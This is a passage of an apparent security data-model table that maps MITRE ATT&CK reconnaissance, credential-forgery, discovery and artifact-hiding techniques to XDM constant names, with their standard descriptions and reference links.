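The fingerprint comparison is the cheap control that catches the "new federation trust" variant: a forged token signed by a certificate the adversary generated will be rejected by a relying party that pins the IdP's real signing certificates, whereas the variant that uses the stolen legitimate key passes this check and can only be caught on lifetime, on claims that do not match the directory, or on the absence of a matching logon at the IdP.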
T1606.001 XDM_CONST.MITRE_TECHNIQUE_FORGE_WEB_CREDENTIALS_WEB_COOKIES Adversaries may forge web cookies that can be used to gain access to web applications or Internet
services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often
use session cookies to authenticate and authorize user access. Adversaries may generate these cookies in
order to gain access to web resources. This differs from [Steal Web Session Cookie](https://
attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by
the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have
standardized and documented cookie values that can be generated using provided tools or interfaces.
(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as
passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed
values. Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie]
(https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication
protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac
Crypto Cookies January 2019) https://attack.mitre.org/techniques/T1606/001
T1592 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION Adversaries may gather information about the victim's hosts that can be used during targeting. Information
about hosts may include a variety of details, including administrative data (ex: name, assigned IP,
functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active
Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/
techniques/T1598). Adversaries may also compromise sites then include malicious content designed to
collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed
to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/
techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases]
(https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities]
(https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/
T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or
[External Remote Services](https://attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/
T1592
T1592.004 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION_CLIENT_CONFIGURATIONS Adversaries may gather information about the victim's client configurations that can be used during
targeting. Information about client configurations may include a variety of details and settings, including
operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
Adversaries may gather this information in various ways, such as direct collection actions via [Active
Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent
strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also
compromise sites then include malicious content designed to collect host information from visitors.(Citation:
ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or
other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase
invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex:
[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical
Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop
Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/
techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/
techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). https://
attack.mitre.org/techniques/T1592/004
T1592.003 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION_FIRMWARE Adversaries may gather information about the victim's host firmware that can be used during targeting.
Information about host firmware may include a variety of details such as type and versions on specific
hosts, which may be used to infer more information about hosts in the environment (ex: configuration,
purpose, age/patch level, etc.). Adversaries may gather this information in various ways, such as direct
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host
firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings,
network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering
this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/
Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://
attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://
attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/
or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit
Public-Facing Application](https://attack.mitre.org/techniques/T1190)). https://attack.mitre.org/techniques/
T1592/003
T1592.001 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION_HARDWARE Adversaries may gather information about the victim's host hardware that can be used during targeting.
Information about hardware infrastructure may include a variety of details such as types and versions on
specific hosts, as well as the presence of additional components that might be indicative of added
defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). Adversaries may
gather this information in various ways, such as direct collection actions via [Active Scanning](https://
attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for
Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then
include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox)
Information about the hardware infrastructure may also be exposed to adversaries via online or other
accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases]
(https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities]
(https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/
T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/
techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). https://
attack.mitre.org/techniques/T1592/001
T1592.002 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_HOST_INFORMATION_SOFTWARE Adversaries may gather information about the victim's host software that can be used during targeting.
Information about installed software may include a variety of details such as types and versions on specific
hosts, as well as the presence of additional components that might be indicative of added defensive
protections (ex: antivirus, SIEMs, etc.). Adversaries may gather this information in various ways, such as
direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports,
server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then include malicious content designed to collect host information
from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to
adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports,
resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of
reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or
[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational
resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities]
(https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise]
(https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/
techniques/T1133)). https://attack.mitre.org/techniques/T1592/002
T1589 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_IDENTITY_INFORMATION Adversaries may gather information about the victim's identity that can be used during targeting.
Information about identities may include a variety of details, including personal data (ex: employee names,
email addresses, etc.) as well as sensitive details such as credentials. Adversaries may gather this
information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/
techniques/T1598). Information about victims may also be exposed to adversaries via online or other
accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-
Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register
Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Gathering this information may reveal
opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://
attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://
attack.mitre.org/techniques/T1078)). https://attack.mitre.org/techniques/T1589
T1589.001 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_IDENTITY_INFORMATION_CREDENTIALS Adversaries may gather credentials that can be used during targeting. Account credentials gathered by
adversaries may be those directly associated with the target victim organization or attempt to take
advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via
[Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise
sites then include malicious content designed to collect website authentication cookies from visitors.
(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or
other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach
dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation:
CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering
this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/
Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/
techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://
attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://
attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). https://
attack.mitre.org/techniques/T1589/001
T1589.002 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_IDENTITY_INFORMATION_EMAIL_ADDRESSES Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist,
organizations may have public-facing email infrastructure and addresses for employees. Adversaries may
easily gather email addresses, since they may be readily available and exposed via online or other
accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-
Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET
Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search
Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://
attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://
attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/
techniques/T1566)). https://attack.mitre.org/techniques/T1589/002
T1589.003 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_IDENTITY_INFORMATION_EMPLOYEE_NAMES Adversaries may gather employee names that can be used during targeting. Employee names can be used to
derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable
lures. Adversaries may easily gather employee names, since they may be readily available and exposed
via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001)
or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open
Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://
attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts]
(https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/
techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). https://attack.mitre.org/
techniques/T1589/003
T1590 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1590
T1590.002 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_DNS Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1590/002
T1590.001 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_DOMAIN_PROPERTIES Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). https://attack.mitre.org/techniques/T1590/001
T1590.005 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_IP_ADDRESSES Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and/or where/how their publicly-facing infrastructure is hosted. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1590/005
T1590.006 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_NETWORK_SECURITY_APPLIANCES Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1590/006
Original Mapped Description
T1590.004 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_NETWORK_TOPOLOGY Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1590/004
T1590.003 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_NETWORK_INFORMATION_NETWORK_TRUST_DEPENDENCIES Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1590/003
T1591 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1591
T1591.002 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION_BUSINESS_RELATIONSHIPS Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1591/002
T1591.001 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION_DETERMINE_PHYSICAL_LOCATIONS Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)). https://attack.mitre.org/techniques/T1591/001
T1591.003 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION_IDENTIFY_BUSINESS_TEMPO Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1591/003
T1591.004 XDM_CONST.MITRE_TECHNIQUE_GATHER_VICTIM_ORG_INFORMATION_IDENTIFY_ROLES Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to. Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business roles may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)). https://attack.mitre.org/techniques/T1591/004
T1615 XDM_CONST.MITRE_TECHNIQUE_GROUP_POLICY_DISCOVERY Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit. https://attack.mitre.org/techniques/T1615
T1200 XDM_CONST.MITRE_TECHNIQUE_HARDWARE_ADDITIONS Adversaries may introduce computer accessories, computers, or networking hardware into a system or network that can be used as a vector to gain access. While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping (Citation: Ossmann Star Feb 2011), network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) (Citation: Aleks Weapons Nov 2015), keystroke injection (Citation: Hak5 RubberDuck Dec 2016), kernel memory reading via DMA (Citation: Frisk DMA August 2016), addition of new wireless access to an existing network (Citation: McMillan Pwn March 2012), and others. https://attack.mitre.org/techniques/T1200
T1564 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015) Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020) https://attack.mitre.org/techniques/T1564
T1564.008 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_EMAIL_HIDING_RULES Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule) Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account. Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair or delay the detection that would have occurred had the email content been seen immediately by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security) https://attack.mitre.org/techniques/T1564/008
T1564.005 XDM_CONST.MITRE_TECHNIQUE_HIDE_ARTIFACTS_HIDDEN_FILE_SYSTEM Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014) Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA) 